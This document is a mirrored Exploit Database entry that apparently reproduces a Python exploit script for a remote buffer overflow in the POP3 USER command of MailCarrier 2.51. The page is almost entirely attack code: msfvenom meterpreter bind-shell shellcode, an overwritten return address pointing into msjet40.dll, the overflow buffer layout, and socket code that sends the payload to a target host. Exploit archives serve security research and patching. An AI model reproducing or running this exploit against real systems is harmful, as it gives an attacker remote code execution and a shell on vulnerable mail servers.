MailCarrier 2.51 – POP3 ‘USER’ Buffer Overflow

• Exploit Database
• 11 阅读

• 作者： Dino Covotsos
  日期： 2019-04-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46699/

• #!/usr/bin/python
  # Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3)
  # Date: 14/04/2019
  # Exploit Author: Dino Covotsos - Telspace Systems
  # Vendor Homepage: https://www.tabslab.com/
  # Version: 2.51
  # Software Link: N.A
  # Contact: services[@]telspace.co.za
  # Twitter: @telspacesystems (Greets to the Telspace Crew)
  # Tested on: Windows XP Prof SP3 ENG x86
  # CVE: TBC from Mitre
  # Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
  # POC
  # 1.) Change ip and port in code
  # 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
  # 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
  # Badchars \x00\xd9
  
  import sys
  import socket
  import time
  
  #msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c
  shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
  "\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b"
  "\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50"
  "\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27"
  "\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51"
  "\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48"
  "\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85"
  "\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e"
  "\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a"
  "\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1"
  "\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44"
  "\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3"
  "\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce"
  "\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b"
  "\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c"
  "\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33"
  "\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e"
  "\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53"
  "\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54"
  "\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61"
  "\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65"
  "\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b"
  "\x48\xf4\x91\x9b\x1b\x0b")
  
  buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode))
  
  print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
  print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  connect=s.connect(("192.168.0.150", 110))
  print s.recv(1024)
  s.send('USER ' + buffer + '\r\n')
  print s.recv(1024)
  s.send('QUIT\r\n')
  s.close()
  time.sleep(1)
  print "[*] Done, but if you get here the exploit failed!"